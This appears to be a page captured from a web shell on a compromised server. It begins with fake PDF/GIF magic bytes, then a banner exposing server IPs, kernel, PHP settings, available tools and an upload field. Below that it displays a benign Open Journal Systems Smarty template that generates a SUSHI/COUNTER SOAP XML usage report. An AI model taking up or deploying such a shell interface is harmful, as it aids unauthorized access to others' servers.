%PDF-1.7 GIF89;
| Server IP : 172.66.157.178 / Your IP : 172.16.20.3 Web Server : Apache/2.4.25 (Debian) System : Linux f64a392e70de 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64 User : application ( 1000) PHP Version : 5.6.40 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /app/plugins/reports/counter/templates/ |
Upload File : |
{**
* plugins/reports/counter/templates/sushixml.tpl
*
* Copyright (c) 2013-2019 Simon Fraser University
* Copyright (c) 2003-2019 John Willinsky
* Distributed under the GNU GPL v2. For full terms see the file docs/COPYING.
*
* SUSHI response XML
*}
<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance"
xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsd="http://www.w3.org/1999/XMLSchema">
<SOAP-ENV:Body>
<ReportResponse
ID="ID0"
xsi:schemaLocation="http://www.niso.org/schemas/sushi/counter http://www.niso.org/schemas/sushi/counter_sushi3_0.xsd"
Created="{$smarty.now|date_format:"%Y-%m-%dT%H:%M:%SZ"}"
xmlns="http://www.niso.org/schemas/sushi/counter"
xmlns:s="http://www.niso.org/schemas/sushi"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<s:Requestor>
<s:ID>{$requestorID|escape:"html"}</s:ID>
<s:Name>{$requestorName|escape:"html"}</s:Name>
<s:Email>{$requestorEmail|escape:"html"}</s:Email>
</s:Requestor>
<s:CustomerReference>
<s:ID>{$customerReferenceID|escape:"html"}</s:ID>
</s:CustomerReference>
<s:ReportDefinition Name="JR1" Release="3">
<s:Filters>
<s:UsageDateRange>
<s:Begin>{$usageDateBegin|escape:"html"}</s:Begin>
<s:End>{$usageDateEnd|escape:"html"}</s:End>
</s:UsageDateRange>
</s:Filters>
</s:ReportDefinition>
<Report>
{include file=$templatePath|concat:"reportxml.tpl" omitWrapper='true'}
</Report>
</ReportResponse>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>